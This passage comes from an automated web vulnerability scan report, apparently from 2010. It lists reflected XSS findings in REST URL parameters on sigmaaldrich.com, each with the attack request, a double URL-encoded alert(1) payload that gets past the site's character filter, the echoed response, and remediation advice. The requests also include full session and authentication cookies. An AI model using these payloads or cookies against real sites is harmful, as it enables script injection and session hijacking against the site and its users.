Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-servicesd19f8";alert(1)//3ffeaa9c5f6","E404") ;
   </script>
...[SNIP]...

1.116. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbf39%2522%253balert%25281%2529%252f%252f9d65c2f2df5 was submitted in the REST URL parameter 1. This input was echoed as dbf39";alert(1)//9d65c2f2df5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentdbf39%2522%253balert%25281%2529%252f%252f9d65c2f2df5/sigma-aldrich/areas-of-interest/life-science/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentdbf39";alert(1)//9d65c2f2df5/sigma-aldrich/areas-of-interest/life-science/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.117. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea4a%2522%253balert%25281%2529%252f%252f269e62f022b was submitted in the REST URL parameter 2. This input was echoed as bea4a";alert(1)//269e62f022b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichbea4a%2522%253balert%25281%2529%252f%252f269e62f022b/areas-of-interest/life-science/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:56 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichbea4a";alert(1)//269e62f022b/areas-of-interest/life-science/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.118. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c264%2522%253balert%25281%2529%252f%252f84d63a888f4 was submitted in the REST URL parameter 3. This input was echoed as 8c264";alert(1)//84d63a888f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest8c264%2522%253balert%25281%2529%252f%252f84d63a888f4/life-science/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest8c264";alert(1)//84d63a888f4/life-science/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.119. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ead34%2522%253balert%25281%2529%252f%252f1355739c73c was submitted in the REST URL parameter 4. This input was echoed as ead34";alert(1)//1355739c73c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-scienceead34%2522%253balert%25281%2529%252f%252f1355739c73c/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:59 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-scienceead34";alert(1)//1355739c73c/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.120. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d3ac%2522%253balert%25281%2529%252f%252f8320d84cdb5 was submitted in the REST URL parameter 5. This input was echoed as 7d3ac";alert(1)//8320d84cdb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog7d3ac%2522%253balert%25281%2529%252f%252f8320d84cdb5 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
